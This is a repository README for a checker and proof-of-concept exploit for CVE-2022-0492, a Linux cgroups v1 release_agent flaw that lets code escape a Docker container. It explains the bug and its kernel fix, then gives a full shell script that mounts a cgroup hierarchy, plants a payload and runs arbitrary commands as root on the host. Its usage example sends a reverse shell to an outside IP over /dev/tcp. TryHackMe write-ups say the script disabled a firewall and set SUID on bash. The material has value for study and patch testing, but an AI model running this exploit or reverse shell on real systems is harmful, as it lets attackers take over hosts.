
Docker Breakout Checker and PoC via CAP_SYS_ADMIN and via user namespaces (CVE-2022-0492)

Primary language: Shell. License: GNU General Public License v3.0 (GPL-3.0).

CVE-2022-0492 Docker Breakout Checker and PoC

Summary

Exploiting the vulnerability requires the attacker to already be running code inside a Docker container on a vulnerable host, either as root with CAP_SYS_ADMIN or, where the container runs without Docker's default seccomp and AppArmor profiles, as a user who can create user and cgroup namespaces. Once exploited, the attacker runs arbitrary commands as root on the host, escaping the container completely.

A vulnerability was found in the cgroup_release_agent_write function in kernel/cgroup/cgroup-v1.c of the Linux kernel. Under certain circumstances, this flaw allows the cgroups v1 release_agent feature to be used to escalate privileges and unexpectedly bypass namespace isolation.

More simply put, cgroups v1 has a feature called release_agent: when the last process in a cgroup exits and that cgroup has notify_on_release set, the kernel runs the program named in the hierarchy's release_agent file. That program is started as root on the host, in the host's own namespaces and with a full capability set, so whoever can write release_agent gets code execution as root on the host. The release_agent file sits in the root directory of a cgroup v1 hierarchy and is owned by root, and mounting such a hierarchy needs CAP_SYS_ADMIN, which is why the escape needs either a container started with CAP_SYS_ADMIN or, on unpatched kernels, the ability to unshare a user namespace (inside which a process becomes root with CAP_SYS_ADMIN over its own mount and cgroup namespaces).

The actual bug is that the kernel relied only on the file's permissions and never checked that the writer held CAP_SYS_ADMIN in the initial user namespace; the fix adds exactly that check, so on a patched kernel the write to release_agent fails with EPERM from inside a user namespace. Two practical caveats: the path written to release_agent is resolved on the host's filesystem, so the payload must be placed somewhere the host can see it (typically the container's overlay upperdir), and the host must still be using cgroups v1, because cgroups v2 has no release_agent at all.
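The technique above, written out as an added example. This is not the repository's CVE-2022-0492.sh and its logic is not taken from that script: it assumes the container root is an overlay mount whose upperdir is visible on the host, that a cgroup v1 hierarchy can still be mounted (the rdma controller is chosen because it is almost never mounted already), and that the caller has CAP_SYS_ADMIN, either directly or as root inside a user namespace on an unpatched kernel (for that route run it as `unshare -UrmC sh example.sh exploit '...'`). The mtab line used in its comments is constructed, not captured from a real host.

```shell
#!/bin/sh
# Added example (not the repository's own script) of the release_agent escape.
# Assumptions: overlay-backed container root, a mountable cgroup v1 hierarchy,
# and CAP_SYS_ADMIN (directly, or via `unshare -UrmC` on an unpatched kernel).
# Usage: sh example.sh check            # report preconditions, change nothing
#        sh example.sh exploit '<cmd>'   # run <cmd> as root on the host

# Pull the overlay upperdir out of one /etc/mtab or /proc/self/mounts line,
# e.g. (constructed) "overlay / overlay rw,lowerdir=...,upperdir=/var/lib/docker/overlay2/abc/diff,workdir=... 0 0".
# That directory is the container's writable layer as the host sees it, so a
# file written to /cmd inside the container appears at $upperdir/cmd on the host.
overlay_upperdir() {
    printf '%s\n' "$1" | sed -n 's/.*upperdir=\([^,]*\).*/\1/p'
}

# Tell a cgroup v2 (unified) mount point apart from a v1 one: only the v2
# hierarchy exposes cgroup.controllers at its root. v2 has no release_agent.
cgroup_version() {
    if [ -f "$1/cgroup.controllers" ]; then echo v2; else echo v1; fi
}

# Host-side path that will be written into release_agent.
release_agent_path() {
    printf '%s/%s\n' "$1" "$2"
}

# Upperdir of the container's root filesystem, read from the live mount table.
root_upperdir() {
    overlay_upperdir "$(sed -n '/^overlay \/ overlay /p' /etc/mtab | head -n 1)"
}

# Non-destructive check of the preconditions.
check() {
    upper=$(root_upperdir)
    if [ -n "$upper" ]; then echo "[+] overlay upperdir: $upper"
    else echo "[-] root is not an overlay mount; no host-visible path for a payload"; fi
    echo "[*] /sys/fs/cgroup is cgroup $(cgroup_version /sys/fs/cgroup)"
    if unshare -UrmC true 2>/dev/null; then
        echo "[+] user/mount/cgroup namespaces can be created (userns route possible)"
    else
        echo "[-] unshare blocked (seccomp/AppArmor); CAP_SYS_ADMIN needed directly"
    fi
    tmp=$(mktemp -d)
    if mount -t cgroup -o rdma cgroup "$tmp" 2>/dev/null; then
        echo "[+] cgroup v1 hierarchy mounted at $tmp"
        umount "$tmp"
    else
        echo "[-] cannot mount a cgroup v1 hierarchy"
    fi
    rmdir "$tmp"
}

# Run $1 as root on the host via release_agent.
exploit() {
    upper=$(root_upperdir)
    [ -n "$upper" ] || { echo "[-] no overlay upperdir"; return 1; }
    tmp=$(mktemp -d)
    mount -t cgroup -o rdma cgroup "$tmp" || return 1
    mkdir -p "$tmp/x"
    echo 1 > "$tmp/x/notify_on_release"
    # The payload is created inside the container but executed by the host.
    printf '#!/bin/sh\n%s\n' "$1" > /cmd
    chmod +x /cmd
    # The vulnerable write. A patched kernel returns EPERM here unless the
    # writer has CAP_SYS_ADMIN in the initial user namespace.
    if ! release_agent_path "$upper" cmd > "$tmp/release_agent" 2>/dev/null; then
        echo "[-] release_agent write denied: kernel is patched"; return 1
    fi
    # Put a process in the child cgroup and let it exit: the cgroup becomes
    # empty, notify_on_release fires, and the host runs $upper/cmd as root.
    sh -c "echo \$\$ > $tmp/x/cgroup.procs"
    echo "[+] release_agent triggered; host executed $upper/cmd"
}

case "${1:-}" in
    check)   check ;;
    exploit) exploit "$2" ;;
esac
```

Because the host interprets the command, anything it writes must go to a host path; writing results to `$upperdir/output` makes them readable as `/output` inside the container.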

Usage

# sh CVE-2022-0492.sh

[>] CVE-2022-0492 Docker Container Escape                                           V
[>] Execute this script in a Docker to check for vulnerability or to exploit it. (º___\/{
[>] Usage:
        sh CVE-2022-0492.sh    --checker                Verify if system is vulnerable.
        sh CVE-2022-0492.sh -c|--command <COMMAND>      Execute command on host machine.
        sh CVE-2022-0492.sh -h|--help                   Print the help panel.

[>] Example:
        sh CVE-2022-0492.sh --command 'bash -c "bash -i >& /dev/tcp/192.168.100.17/4444 0>&1"'

Examples

Hamlet from TryHackMe

Root on the host machine obtained by disabling UFW and then sending a reverse shell.

Misguided Ghosts from TryHackMe

Root on the host machine obtained by setting the SUID bit on bash, and a reverse shell was sent as well.

Sources: